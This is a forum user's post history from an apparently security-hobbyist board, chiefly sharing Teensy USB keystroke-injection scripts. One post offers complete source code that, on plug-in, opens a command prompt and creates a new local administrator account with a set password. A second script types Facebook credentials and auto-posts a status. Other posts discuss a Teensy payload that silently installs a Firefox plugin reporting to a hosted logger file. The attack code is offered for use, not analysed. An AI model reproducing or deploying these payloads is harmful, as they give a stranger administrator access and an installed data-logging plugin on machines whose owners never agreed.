Jump to content

Elementix

Active Members
  • Posts

    27
  • Joined

  • Last visited

Recent Profile Visitors

2,230 profile views

Elementix's Achievements

Newbie

Newbie (1/14)

  1. Trying the sharky program today, I was able to listen to songs but it seems like the download selected button doesn't work. Nothing gets added to the queue. Is there a fix for this?
  2. I'd still like to get that android app for my phone....
  3. It works great when it does work. I'm not sure what's different about the 2 different computers I tried it on. Both of them were fresh installs of Windows 7 from the same disc. Only firefox installed and nothing else. One's a desktop, and one's a laptop, but only the laptop seemed to install it. Just don't know what could be different..
  4. Well, apparently it just decided that it wanted to start working....Thanks anyway guys. :) Edit: Ok, so it worked on a new virtual machine with XP but it doesn't seem to want to work with my clean install of Windows 7 on my actual machine.. *sigh*...guess I'll keep playing with it...
  5. Well, that's not the problem...I'm on a quad-core machine with 3 gigs of ram. I've tried it on my pc, which is running a 32-bit copy of Windows 7 and I also tried it in 2 seperate virtual machines running a fresh install of XP with firefox installed. It does seems like it's working, but everything is going so fast I can't even see if there are any errors being displayed... All I did was change the website path in your code to the path to my logger.txt file and my hosted .php file. That's all I should have to mess with right?
  6. Ok, so I understand how things work now and I got things running for the most part...but for some reason it isn't working. It doesn't look like it adds anything new into the mozilla portion of the registry and I don't see any new plugins/addons in firefox. I've tried on 3 different PCs and I'm kinda stuck right now.....any thoughts?
  7. Well thanks for assuming that I asked a question without looking things over. I DID look at the code, but just because I'm here doesn't mean I know all the in's and out's of how everything works, so chill out with that crap. With that being said, are all these files just flashed onto the teensy (besides the php script)? I'm just a bit confused...
  8. Can you go into a little more detail on how exactly this works? Does the FF plugin go onto a seperate thumbdrive or does it download the plugin then install it? The rest of it seems pretty straightforward..
  9. So did your app get removed or something? I tried to find it in the market and through a QR code to the app and nothing. If they are removing it are you going to just post it here? Thanks! Ready to try the app...
  10. lol, well...sorry about that. Maybe he modeled his from yours first. Credit to you as well then! :)
  11. hmm...didn't think about that... I'm testing on an admin account on 7 so that must be why it works for me. Like I said tho, if you know a way to fix it, feel free to add to it....
  12. Here's another version of w02057's Ducky Script. I'm still learning this whole coding thing, so bear with me. I'm not sure what his code was written in (C??) so I just remade it. There's still no minimizing of the command prompt, but the window doesn't stay open for very long anyway. Feel free to contribute. Credit goes to w02057 tho. :) Oh, and can someone tell me what kind of code is below?? // DUCKY_WAS_HERE - Teensy // Based on w02057's Ducky script (Pretty much the exact same thing) - 5/7/2010 - 3:30PM int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim ledstart(); // lights up when connected delay(3000); // delay for computer ledstart(); // lights up when payload starts Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); d(); // this is a 100ms delay, see below for commands. Keyboard.print("cmd"); // Opens cmd prompt d(); enter(); delay(1000); // delay for prompt to load Keyboard.print("net user DuckyWasHere quackquack /add"); //First command (Username/Password) Keyboard.send_now(); enter(); d(); Keyboard.print("net localgroup Administrators DuckyWasHere /add"); //Second command Keyboard.send_now(); enter(); d(); Keyboard.print("exit"); //Exit cmd Keyboard.send_now(); enter(); d(); } void loop() { // Maybe a flashing LED? } void enter() { Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void sendClearKeys() { Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } // LED command for end of script. void ledend(){ Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.set_modifier(0); Keyboard.send_now(); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); delay (500); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); } // LED command for start of script void ledstart(){ digitalWrite(ledPin, HIGH); delay (1000); digitalWrite(ledPin, LOW); } // delay 100ms void d(){ delay(100); }
  13. Hey guys, here's some code to auto-post a facebook status. Not sure of why you'd want to have the same status posted every time you plug in the teensy, but maybe someone else can build on it. Feel free to contribute to it. Cheers! :) // Facebook Status Updater - Teensy // Based on vulg4h's Facebook script and iann0036's IP to Twitter script - 5/7/2010 - 2:41PM int ledPin = 11; void setup() { pinMode(ledPin, OUTPUT); // put this before other led commands or the LED will be dim ledstart(); // lights up when connected delay(3000); // delay for computer ledstart(); // lights up when payload starts Keyboard.set_modifier(MODIFIERKEY_GUI); Keyboard.send_now(); Keyboard.set_key1(KEY_R); Keyboard.send_now(); Keyboard.set_key2(0); Keyboard.send_now(); d(); // this is a 100ms delay, see below for commands. Keyboard.print("http://facebook.com"); // goes to facebook d(); enter(); delay(6000); // delay for browser to load Keyboard.set_key2(KEY_TAB); Keyboard.send_now(); Keyboard.print("FACEBOOK USERNAME"); Keyboard.send_now(); d(); Keyboard.set_key2(KEY_TAB); Keyboard.send_now(); d(); Keyboard.print("FACEBOOK PASSWORD"); Keyboard.send_now(); enter(); delay(9000); // let browser load Keyboard.set_modifier(MODIFIERKEY_CTRL); // set browser to search-page Keyboard.set_key1(KEY_F); sendClearKeys(); delay(100); Keyboard.print("What's on"); // search for "What's on" Keyboard.set_key1(KEY_ESC); // escape search sendClearKeys(); delay(100); Keyboard.set_key1(KEY_DELETE); sendClearKeys(); delay(100); Keyboard.set_key1(KEY_DELETE); sendClearKeys(); delay(100); Keyboard.print("FACEBOOK STATUS TO BE POSTED"); // new status content delay(100); Keyboard.set_key1(KEY_TAB); sendClearKeys(); enter(); } void loop() { // Maybe a flashing LED? } void enter() { Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.set_key1(0); Keyboard.send_now(); } void sendClearKeys() { Keyboard.send_now(); Keyboard.set_modifier(0); Keyboard.set_key1(0); Keyboard.send_now(); } // LED command for end of script. void ledend(){ Keyboard.set_key1(0); Keyboard.set_key2(0); Keyboard.set_modifier(0); Keyboard.send_now(); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); delay (500); digitalWrite(ledPin, HIGH); delay (500); digitalWrite(ledPin, LOW); } // LED command for start of script void ledstart(){ digitalWrite(ledPin, HIGH); delay (1000); digitalWrite(ledPin, LOW); } // delay 100ms void d(){ delay(100); }
×
×
  • Create New...